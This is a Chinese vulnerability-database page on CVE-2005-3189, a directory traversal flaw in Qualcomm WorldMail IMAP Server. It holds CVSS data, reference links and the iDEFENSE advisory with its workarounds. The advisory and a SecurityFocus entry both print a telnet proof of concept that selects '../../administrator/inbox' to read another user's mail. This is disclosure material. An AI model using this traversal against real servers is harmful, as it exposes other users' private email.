CVE-2005-3189
CVSS5.0
发布时间 :2005-11-17 21:02:00
修订时间 :2011-03-07 21:25:59
NMCOPS    

[原文]Directory traversal vulnerability in Qualcomm WorldMail IMAP Server allows remote attackers to read arbitrary email messages via ".." sequences in the SELECT command.


[CNNVD]Qualcomm Worldmail服务器目录遍历漏洞(CNNVD-200511-229)

        Qualcomm WorldMail是一款邮件和消息服务器,支持IMAP、POP3、SMTP和web邮件功能。
        Qualcomm WorldMail IMAP Server中存在目录遍历漏洞。IMAP协议支持使用多个文件夹,包含一些命令允许用户指定特定的路径。Qualcomm WorldMail服务器可能允许多个命令指定当前用户邮箱以外的文件夹,这样攻击者就可以浏览和管理系统上存储的其他用户邮件消息,或移动任意文件夹。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3189
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3189
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200511-229
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2005/2479
(UNKNOWN)  VUPEN  ADV-2005-2479
http://www.idefense.com/application/poi/display?id=341&type=vulnerabilities
(VENDOR_ADVISORY)  IDEFENSE  20051117 Qualcomm WorldMail IMAP Server Directory Traversal Vulnerability
http://www.securityfocus.com/bid/15488
(UNKNOWN)  BID  15488
http://securitytracker.com/id?1015236
(UNKNOWN)  SECTRACK  1015236
http://securityreason.com/securityalert/192
(UNKNOWN)  SREASON  192
http://secunia.com/advisories/17640
(UNKNOWN)  SECUNIA  17640

- 漏洞信息

Qualcomm Worldmail服务器目录遍历漏洞
中危 路径遍历
2005-11-17 00:00:00 2005-11-22 00:00:00
远程  
        Qualcomm WorldMail是一款邮件和消息服务器,支持IMAP、POP3、SMTP和web邮件功能。
        Qualcomm WorldMail IMAP Server中存在目录遍历漏洞。IMAP协议支持使用多个文件夹,包含一些命令允许用户指定特定的路径。Qualcomm WorldMail服务器可能允许多个命令指定当前用户邮箱以外的文件夹,这样攻击者就可以浏览和管理系统上存储的其他用户邮件消息,或移动任意文件夹。
        

- 公告与补丁

        暂无数据

- 漏洞信息 (F41692)

iDEFENSE Security Advisory 2005-11-17.t (PacketStormID:F41692)
2005-11-20 00:00:00
iDefense Labs  idefense.com
exploit,remote,imap
CVE-2005-3189
[点击下载]

iDEFENSE Security Advisory 11.17.05 - Remote exploitation of a directory transversal vulnerability in Qualcomm WorldMail IMAP Server allows attackers to read any email stored on the system. Exploitation details provided. Tested against Qualcomm Worldmail server version 3.0. Other versions may be vulnerable.

Qualcomm WorldMail IMAP Server Directory Traversal Vulnerability

iDEFENSE Security Advisory 11.17.05
www.idefense.com/application/poi/display?id=341&type=vulnerabilities
November 17, 2005

I. BACKGROUND

Qualcomm WorldMail is an email and messaging server designed for use
in small to large enterprises that supports IMAP, POP3, SMTP, and web
mail features.

More information can be found on the vendors site:

  http://www.eudora.com/worldmail/

II. DESCRIPTION

Remote exploitation of a directory transversal vulnerability in Qualcomm
WorldMail IMAP Server allows attackers to read any email stored on the
system.

The IMAP protocol supports the use of multiple folders and contains
commands with allow users to specify specific paths. Qualcomm WorldMail
server allows multiple commands to specify folders outside of the
current user's mailbox.

Attackers can leverage this vulnerability to view and manage any other
user's email messages stored on the system. Attackers also have the
ability to move any arbitrary folder on the system.

Exploitation is trivial and can be done with a simple telnet client.
Below is an example transaction highlighting the attack:

-----------------------------------
c:\> telnet 192.168.0.109 143

* OK WorldMail IMAP4 Server 6.1.19.0 ready
1 login user1 user1
1 OK LOGIN completed

2 select /inbox
* 0 EXISTS
* OK [UNSEEN 0]
2 OK [READ-WRITE] opened /inbox

2 select ./../../administrator/inbox
* 1 EXISTS
* OK [UNSEEN 1] Message 1 is first unseen
2 OK [READ-WRITE] opened ./../../administrator/inbox

2 fetch 1 (RFC822.TEXT)
* 1 FETCH (RFC822.TEXT {131}

this message was sent to administrator
------------------------------------

III. ANALYSIS

Successful exploitation of this vulnerability allows attackers to view
and delete mail from any user on the system. Attackers may also be able
to affect system stability with the ability to move arbitrary folders on
the affected system.

This is a post authentication exploit. In order to exploit this
vulnerability an attacker would need a valid login to the email server
and the IMAP module would have to be enabled (default).

IV. DETECTION

This exploit was tested against Qualcomm Worldmail server version 3.0.
Other versions may be vulnerable.

V. WORKAROUND

As the affected commands cannot be disabled, it is important that only
trusted users be allowed to access the vulnerable mail server.
Exploitation of this vulnerability can only be done after a user is
authenticated to the mail server. Therefore, it is recommended that
login credentials be reviewed to ensure that only trusted users have
access.

WorldMail also supports POP access to email. If disabling the IMAP
service completly is an option, this will also prevent exploitation of
the vulnerability.

VI. VENDOR RESPONSE

Multiple attempts have been made to inform the vendor of this
vulnerability but to date a response has not yet been received.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-3189 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

10/12/2005  Initial vendor notification
10/27/2005  Initial vendor response
11/17/2005  Public disclosure

IX. CREDIT

The vulnerability was discovered by FistFuXXer.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright     

- 漏洞信息

20948
Eudora WorldMail IMAP Server select Command Traversal Arbitrary Mail Spool Access
Input Manipulation
Loss of Confidentiality Solution Unknown

- 漏洞描述

- 时间线

2005-11-17 2005-10-12
2005-11-17 Unknow

- 解决方案

OSVDB is not aware of a solution for this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Qualcomm Worldmail Server Directory Traversal Vulnerability
Input Validation Error 15488
Yes No
2005-11-17 12:00:00 2009-07-12 05:56:00
FistFuXXer is credited with the discovery of this vulnerability.

- 受影响的程序版本

Qualcomm Eudora WorldMail Server 3.0

- 漏洞讨论

Qualcomm Worldmail server is prone to a directory traversal vulnerability.

Successful exploitation could allow an attacker to gain access to files owned by other users of the application.

Sensitive information may be obtained and modified in this manner.

Worldmail server version 3.0 is vulnerable; other versions may also be affected.

- 漏洞利用

No exploit is required:

The following proof of concept example is available:

c:\> telnet 1.2.3.4 143

* OK WorldMail IMAP4 Server 6.1.19.0 ready
1 login user1 user1
1 OK LOGIN completed

2 select /inbox
* 0 EXISTS
* OK [UNSEEN 0]
2 OK [READ-WRITE] opened /inbox

2 select ./../../administrator/inbox
* 1 EXISTS
* OK [UNSEEN 1] Message 1 is first unseen
2 OK [READ-WRITE] opened ./../../administrator/inbox

2 fetch 1 (RFC822.TEXT)
* 1 FETCH (RFC822.TEXT {131}

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站